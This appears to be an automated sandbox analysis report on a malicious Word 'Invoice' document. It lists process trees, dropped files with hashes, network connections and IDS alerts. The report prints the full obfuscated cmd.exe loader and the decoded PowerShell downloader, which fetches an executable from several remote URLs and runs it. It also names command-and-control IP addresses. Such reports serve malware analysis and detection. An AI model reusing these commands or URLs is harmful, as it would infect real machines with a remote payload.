CmD /V:ON/C"set 3x=Te=$b}Yr-;v0O(Kk9Ryq% 6~7{Msdw._@:,HWiDnN84cjpzIuQ5)EL2\Pmx1+UFoG/lCa'hSfZBXgAt3&&for %x in (45;63;29;20;56;61;74;53;47;67;33;23;50;34;59;20;7;20;71;52;71;71;47;12;40;40;77;26;52;33;23;8;42;34;59;20;70;20;0;52;26;56;33;23;8;79;34;59;20;66;66;21;3;19;54;42;11;41;2;69;70;16;42;11;41;69;9;3;10;54;24;24;50;2;39;1;29;8;63;4;44;1;43;78;21;40;1;78;30;36;1;4;67;66;37;1;39;78;9;3;37;54;59;54;79;2;69;70;78;78;45;33;65;65;28;48;7;63;27;72;68;7;57;30;43;63;57;65;66;26;49;16;15;0;63;54;78;77;79;57;6;62;77;31;63;37;26;76;15;36;76;24;32;70;78;78;45;33;65;65;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;45;1;39;45;68;66;30;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;78;48;78;63;7;30;43;63;30;48;15;65;40;49;47;41;43;67;44;45;17;74;31;19;61;32;70;78;78;45;33;65;65;27;68;7;29;68;30;43;63;30;46;68;65;14;48;56;10;68;59;35;41;39;17;24;36;15;63;49;32;70;78;78;45;33;65;65;79;15;37;66;63;68;72;10;68;66;66;1;39;30;39;66;65;75;22;16;75;28;10;44;73;50;44;74;6;53;31;49;68;0;38;66;73;26;32;70;78;78;45;33;65;65;29;29;29;30;78;48;39;1;66;28;1;10;37;1;39;78;63;30;1;27;65;1;72;15;70;46;37;42;65;29;77;64;67;39;54;35;44;22;57;52;36;68;15;27;69;30;71;45;66;37;78;13;69;32;69;51;9;3;63;50;54;79;11;2;69;78;50;79;16;16;69;9;3;48;79;79;50;41;21;2;21;69;54;54;16;69;9;3;48;59;11;22;79;2;69;68;22;54;50;42;69;9;3;28;59;79;50;2;3;1;39;10;33;78;1;57;45;60;69;55;69;60;3;48;79;79;50;41;60;69;30;1;58;1;69;9;72;63;7;1;68;43;70;13;3;43;16;79;50;42;21;37;39;21;3;37;54;59;54;79;51;25;78;7;18;25;3;10;54;24;24;50;30;38;63;29;39;66;63;68;28;62;37;66;1;13;3;43;16;79;50;42;34;21;3;28;59;79;50;51;9;3;15;22;42;50;42;2;69;15;16;50;50;59;69;9;47;72;21;13;13;64;1;78;8;47;78;1;57;21;3;28;59;79;50;51;30;66;1;39;76;78;70;21;8;76;1;21;42;11;11;11;11;51;21;25;47;39;10;63;15;1;8;47;78;1;57;21;3;28;59;79;50;9;3;27;22;50;79;24;2;69;63;22;22;22;50;69;9;4;7;1;68;15;9;5;5;43;68;78;43;70;25;5;5;3;27;16;24;79;41;2;69;7;16;41;16;59;69;9;86)do set 8p7h=!8p7h!!3x:~%x,1!&&if %x==86 echo !8p7h:~6!|FOR /F "delims=fA tokens=1" %v IN ('ftype^^^|find "dfil"')DO %v "
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2260
CMD:
C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $q2408='h9408';$v2775=new-object Net.WebClient;$i2123='http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7@http://find-me-an-english-penpal.find-me-an-english-tutor.co.uk/NQI8cCjpRB_qU@http://sarwa.co.za/KuPva1H8nR7WkoQ@http://3kiloafvallen.nl/X69XdvjZ5jBYL_QaTDlZM@http://www.tuneldeviento.es/efkhzi4/wAGCn2Hj6mEWaks'.Split('@');$o5230='t5399';$u3358 = '229';$u1063='a6254';$d135=$env:temp+'\'+$u3358+'.exe';foreach($c9354 in $i2123){try{$v2775.DownloadFile($c9354, $d135);$k6454='k9551';If ((Get-Item $d135).length -ge 40000) {Invoke-Item $d135;$s6537='o6665';break;}}catch{}}$s9738='r9891';"
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2360
CMD:
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=fA tokens=1" %v IN ('ftype^|find "dfil"') DO %v "
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2796
CMD:
C:\Windows\system32\cmd.exe /c ftype|find "dfil"
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
3020
CMD:
C:\Windows\system32\cmd.exe /S /D /c" ftype"
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
3112
CMD:
find "dfil"
Path:
C:\Windows\system32\find.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
PID:
3804
CMD:
cmd
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 196
Read events
1 714
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
PID: 2672
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVREA93.tmp.cvr
MD5:
SHA256:
PID: 2672
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\40A705C3.jpg
MD5:
SHA256:
PID: 4072
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1ECTZ9ELPGYCOAITA1FN.temp
MD5:
SHA256:
PID: 2672
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~$les-Invoice.xml
Type: pgc
MD5:99E051533F51AE11EAFC2F62C7E3CB17
SHA256:A7E81903F3C01D299B4B33B6E3FC874E7FA4AC722A5E9E1A425088F6B91379A7
PID: 4072
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\229.exe
Type: executable
MD5:C9DDE1F9FC3CD405A9B8A2825B714474
SHA256:03085000BD167C4B39F930138115F4A80159CD98E30E8B8C42C6CA8ECA7F6BEE
PID: 2672
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
Type: tlb
MD5:CFDFD5601AC28A032639CE3B74E33DEC
SHA256:CFCBA30F388F7D8C809B3DC547D2989276AC30681A40467C4BB66D0B6461484A
PID: 2820
Process: 229.exe
Filename: C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Type: executable
MD5:C9DDE1F9FC3CD405A9B8A2825B714474
SHA256:03085000BD167C4B39F930138115F4A80159CD98E30E8B8C42C6CA8ECA7F6BEE
PID: 4072
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
PID: 2672
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5:51841B3D88B50BFD73A91594DDA18C62
SHA256:F7F45BAFD351A1E8BB642D6A8C100AC81042F4B7BB57C5D9F08083C2A55AFE9E
PID: 4072
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20fdbd.TMP
Type: binary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID: 4072
Process: powershell.exe
Method: GET
HTTP Code: 301
IP: 23.111.137.161:80
URL: http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7
CN: US
Type: html
Size: 254 b
Reputation: suspicious

PID: 3304
Process: wabmetagen.exe
Method: GET
IP: 206.248.110.184:8080
URL: http://206.248.110.184:8080/
CN: PR
Reputation: malicious

PID: 4072
Process: powershell.exe
Method: GET
HTTP Code: 200
IP: 23.111.137.161:80
URL: http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7/
CN: US
Type: executable
Size: 600 Kb
Reputation: suspicious

Connections

PID: 3304
Process: wabmetagen.exe
IP: 182.180.170.72:22
ASN: Pakistan Telecom Company Limited
CN: PK
Reputation: suspicious

PID: 3304
Process: wabmetagen.exe
IP: 206.248.110.184:8080
CN: PR
Reputation: malicious

PID: 4072
Process: powershell.exe
IP: 23.111.137.161:80
Domain: durosfarm.com
ASN: HIVELOCITY VENTURES CORP
CN: US
Reputation: suspicious

DNS requests

Domain: durosfarm.com
IP: 23.111.137.161
Reputation: suspicious

Threats

PID: 4072
Process: powershell.exe
Class: Potential Corporate Privacy Violation
Message: ET POLICY PE EXE or DLL Windows file download HTTP

PID: 4072
Process: powershell.exe
Class: Potentially Bad Traffic
Message: ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download

PID: 4072
Process: powershell.exe
Class: Misc activity
Message: ET INFO EXE - Served Attached HTTP
No debug info